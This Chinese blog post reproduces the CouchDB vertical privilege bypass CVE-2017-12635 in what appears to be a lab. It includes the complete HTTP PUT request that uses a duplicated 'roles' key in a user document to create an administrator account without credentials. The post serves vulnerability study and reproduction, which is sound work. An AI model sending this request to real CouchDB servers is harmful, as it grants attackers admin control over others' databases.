Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

最新推荐文章于 2024-06-10 22:30:14 发布
最新推荐文章于 2024-06-10 22:30:14 发布
阅读量2.4k 收藏
点赞数 1
分类专栏: 学海无涯 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/121767180
版权

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

影响版本:小于 1.7.0 以及 小于 2.1.1

产品样子:

 环境启动后,访问http://your-ip:5984/_utils/即可看到一个web页面,说明Couchdb已成功启动。但我们不知道密码,无法登陆。

首先,发送如下数据包:

PUT /_users/org.couchdb.user:access HTTP/1.1
Host: 192.168.1.53:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 92

{
  "type": "user",
  "name": "access",
  "roles": ["_admin"],
  "password": "access"
}

相应的结果是403错误:{"error":"forbidden","reason":"Only _admin may set roles"},只有管理员才能设置Role角色:

 

 发送包含两个roles的数据包,即可绕过限制:

PUT /_users/org.couchdb.user:access HTTP/1.1
Host: 192.168.1.53:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 106

{
  "type": "user",
  "name": "access",
  "roles": ["_admin"],
"roles": [],
  "password": "access"
}

相应结果:

成功创建管理员,账户密码均为access

 

 

时光凉春衫薄
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
weixin_45260839的博客
06-18 977
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
CouchDB垂直越权漏洞CVE-2017-12635
Kevin's Blog
07-24 1849
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 访问环境五、防御措施 一、漏洞原理 二、触发条件 三、漏洞场景 / 挖掘思路 四、漏洞复现 4.1 漏洞环境 4.2 启动环境 4.3 访问环境 五、防御措施 ...
cve_2017_12635-CouchDB垂直权限绕过
最新发布
c0529的博客
06-10 492
2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。使用大佬给的exp(exp在顶上的参考链接里面)影响版本:小于1.7.0以及小于2.1.1。直接拿到了flag,大佬真的太强了。打开vulfocus对应靶场。
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
weixin_46239998的博客
01-01 835
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。影响版本:小于 1.7.0 以及 小于 2.1.1。密码:password。
安全漏洞】水平权限漏洞垂直权限漏洞
qq_43783527的博客
12-26 1640
权限校验非常重要。如果不对水平、垂直权限做校验,就会发生泄漏用户数据的事故,造成P0故障。
Couchdb 垂直权限绕过漏洞CVE-2017-12635)复现
锋刃科技的博客
05-06 3253
简介 Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 影响版本 版本<1.7.0以及 <2.1.1 环境搭建 https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 编译及启动环境: ...
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
guile-couchdb:指导方案的Couchdb
02-04
1. 连接CouchDB:通过`make-couchdb-client`函数建立到CouchDB服务器的连接,指定URL和认证信息。 2. 创建数据库:使用`create-database`函数创建一个新的数据库,如`create-database '("mydb")`。 3. 存储文档:将...
couchdb-si-support-0.1-sources.jar
03-05
jar包,官方版本,自测可用
couchdb-orm:一个简单的CouchDB ORM
02-04
"couchdb-orm"项目就是这样一个专门为CouchDB设计的ORM框架,它旨在为Crystal编程语言提供方便、直观的数据库访问接口。 CouchDB是一款基于JSON文档的分布式数据库,其核心特性包括强大的文档存储、视图(View)...
Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现
qq_42430287的博客
12-18 1332
Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现
Couchdb垂直权限绕过(CVE-2017-12635)
m0_65150886的博客
01-15 464
它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。
漏洞复现----50、Couchdb 垂直权限绕过漏洞CVE-2017-12635
七天
07-08 1580
Couchdb 垂直权限绕过漏洞CVE-2017-12635
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 375
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
Couchdb 任意命令执行漏洞CVE-2017-12636)
weixin_44311721的博客
07-30 1432
Couchdb 任意命令执行漏洞CVE-2017-12636) Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的...
漏洞复现】vulhub couchdb/CVE-2017-12635
qq_46421742的博客
07-05 159
CouchDB(全称为Apache CouchDB)是一个开源的面向文档的数据库管理系统。它采用了基于文档的NoSQL模型,具有分布式、可扩展和高性能的特点。以下是一些关键特点和优势:文档存储:CouchDB以文档为核心,使用JSON格式存储数据。每个文档都有一个唯一的标识符(ID)和一个JSON格式的内容。这种存储方式使得数据的表示更加灵活和自由。分布式架构:CouchDB支持水平扩展,可以在多个节点上分布数据,实现负载均衡和高可用性。
垂直越权漏洞的修复
热门推荐
u011651342的博客
05-23 1万+
前段时间我参与的项目被公司的安全部门检测出垂直越权的安全漏洞,我组长让我负责修复一下。 首先我查阅了一下什么是越权,以及什么是垂直越权。 (一)越权以及垂直越权 越权访问漏洞指应用在检查授权时存在纰漏,使得攻击者在获得低权限用户账户后,可以利用一些方式绕过权限检查,访问或者操作到原本无权访问的高权限功能,在实际的代码审计中,这种漏洞往往很难通过工具进行自动化监测,因此在实际应用中危害很大。其与未授权访问有一定差别,目前存在着两种越权操作类型,横向越权操作(水平越权)和纵向越权操作(垂直越权) 水平越
6f940c91ee6c hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:5984->5984/tcp couchdb0 b38fcba5811f hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:8984->5984/tcp couchdb3 f35978830422 hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:6984->5984/tcp couchdb1
05-24
这是一个运行了三个 CouchDB 容器的 Docker 服务。这些容器的镜像来自于 Hyperledger Fabric 项目,用于支持区块链网络的数据存储和查询。每个容器都暴露了不同的端口,其中 5984 是 CouchDB 的默认端口,8984 和 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值